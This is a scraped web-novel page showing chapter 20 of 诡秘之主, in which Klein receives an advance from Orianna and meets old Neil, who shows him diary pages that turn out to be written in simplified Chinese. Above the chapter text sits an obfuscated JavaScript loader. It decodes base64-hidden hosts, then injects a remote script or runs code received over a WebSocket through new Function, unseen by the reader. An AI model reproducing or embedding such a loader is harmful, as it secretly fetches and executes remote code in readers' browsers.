宜小说

字:
关灯 护眼
宜小说 > 诡秘之主 > 第二十章 健忘的邓恩
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第二十章 健忘的邓恩

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
  奥利安娜听罗珊转述了邓恩.史密斯的安排后,拿出便签,写了个预支单:
  “你签下字。有印章吗?没有就按个手印。”
  “好的。”克莱恩熟稔地完成了手续。
  奥利安娜拿出铜制钥匙,打开了房内的保险柜,边点数着金镑,边微笑说道:
  “你真幸运,今天有足够的现金,对了,克莱恩,你是因为牵涉邪异事件,本身又有特长,才被队长邀请的?”
  “是的,女士你的直觉很准。”克莱恩没吝啬赞美。
  奥利安娜取出四张浅灰为底,深黑做纹的钞票,重新锁上了保险柜,一边转身,一边笑道:
  “因为我也是这样的。”
  “是吗?”克莱恩适当表示了诧异。
  “你知道十六年前轰动了整个廷根市的那个连环杀手吗?”奥利安娜将四张金镑递给了克莱恩。
  “……记得!就是连杀了五位少女,有的取心脏,有的拿走胃部的那个‘血腥屠夫’?小时候,我母亲经常拿这件事情吓唬我妹妹。”克莱恩略一思索道。
  他接过钞票,发现是两张5镑和两张1镑的,都灰底黑纹,四角有复杂图案和特殊水印仿伪。
  前者略大,中央是鲁恩王国第五位国王,乔治三世的直系先祖,亨利.奥古斯都一世,他带着白色发套,脸庞圆润,眼睛狭长,表情异常严肃,可在克莱恩眼里,却有着说不出的亲近。
  这可是5镑的钞票!
  等于班森近四周的薪水!
  1镑纸币的中央是乔治三世的父亲,前任国王威廉.奥古斯都六世,这位“强势者”有着浓密的胡须和坚毅的眼神,他在位期间,鲁恩王国摆脱了陈旧的束缚,再一次走到了诸国的顶端。
  这都是“好国王”……克莱恩隐约闻到了那让人心旷神怡的钞票油墨味。
  “对,如果不是值夜者们及时赶到,我就是第六位受害者了。”奥利安娜太太的语气里还藏着一丝后怕,即使这件事情已经过去了十几年。
  “听起来那个连环杀手,不,屠夫,是个非凡者?”克莱恩小心翼翼折好纸币,放入正装内侧的口袋,然后在附近连续摸了几下,以做确认。
  “是的。”奥利安娜太太沉重点头,“他之前杀的人还有很多,那次之所以被抓到,是因为他在准备一个恶魔仪式。”
  “难怪要不同的内脏器官……抱歉,女士,让你回忆起不好的事情了。”克莱恩诚恳说道。
  奥利安娜轻笑道:“我早就不怕了……那时候我在商业学校读会计,再之后,就来这里了,好了,不耽搁你了,你还得去找老尼尔。”
  “再见,女士。”克莱恩脱帽行礼,退出了办公室,临下楼梯前,又忍不住摸了摸内侧口袋,确认那12镑钞票还在。
  他于十字路口拐弯,向右侧前行,没多久就看到了一扇半掩的铁门。
  咚,咚,咚。
  敲门声中,内里有苍老的声音道:
  “进来吧。”
  克莱恩推开铁门,发现这是一个狭窄的房间,只能摆放下一张桌子和两张椅子。
  在房间那面,还有扇紧紧锁着的铁门,而桌子背后,一位头发花白身穿古典黑袍的老者正就着煤气灯的光芒阅读几张泛黄的书页。
  他抬起头,看向门口道:
  “你就是克莱恩.莫雷蒂?刚才小罗珊过来说你很有礼貌。”
  “罗珊小姐真是位友善的人,下午好,尼尔先生。”克莱恩脱帽致意。
  “坐吧。”尼尔指了指桌上花纹繁复的镶银锡罐,“要来杯手磨咖啡吗?”
  他眼角和嘴边的皱纹很深,一双暗红的眸子略显浑浊。
  “您好像都没有喝?”克莱恩敏锐注意到尼尔的陶瓷杯子里是清水。
  “哈哈,这是我的习惯,下午3点之后不喝咖啡。”尼尔笑着解释了一句。
  “为什么?”克莱恩随口问道。
  尼尔含笑看向克莱恩的双眼道:
  “我怕晚上睡眠不好,那样会听见一些莫名存在低语的。”
  ……克莱恩一下不知道该怎么接话了,转而问道:
  “尼尔先生,我该阅读哪些文献和典籍?”
  他边说边将邓恩.史密斯写的“条子”拿了出来。
  “和历史有关的,复杂的,零碎的,老实说,我一直在尝试学习,但只能掌握初步的,其他太麻烦了,什么当时人们的日记,流行的书籍,墓志铭,等等,等等。”尼尔抱怨道,“比如我手头的这些,就需要更加详细的历史记载来推断具体内容。”
  “为什么?”克莱恩听得有点迷糊。
  尼尔指着面前的几张泛黄书页道:
  “这是罗塞尔.古斯塔夫死前遗失的日记,他为了保密,都是用自己发明的奇怪符号来记录。”
  罗塞尔大帝?穿越者前辈?克莱恩愣了愣,旋即专注倾听。
  “因为很多人相信他并未真正死去,而是成为了隐秘的神灵,所以一直有崇拜他的邪教徒举行各种仪式,试图获得力量,我们偶尔就会遇到这类事情,获得几张原本或者抄写本的笔记。”尼尔摇头说道,“到今天,还没有谁能解读出那些特殊符号的真正象征,所以‘圣堂’允许我们保留副本研究,希望能有意外的惊喜。”
  说到这里,尼尔露出了得意的笑容:
  “我已经解读出了其中几个符号,确认那是数字的表达,看看,我发现了什么,这其实是一本日记!嗯,我希望用当时不同日期的历史事件,尤其皇帝身边的事件,与日记对应那天的记载做比较,从而解读出更多的符号。”
  “天才的思路,对吧?”这位头发花白皱纹深深的老先生目光发亮地看向克莱恩。
  克莱恩赞同点头:
  “是的。”
  “哈哈,你也可以看看,明天就得开始帮我做这方面的工作了。”尼尔老先生将那几张泛黄的书页推给了克莱恩。
  克莱恩将它们转正,只是瞄了一眼,整个人就呆在了那里!
  虽然那些“符号”被临摹描绘得很丑,有些微变形,但自己绝对不会认错……
  因为这是自己最熟悉的文字:
  中文!
  TM还是简体字!
  PS:求推荐票~
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师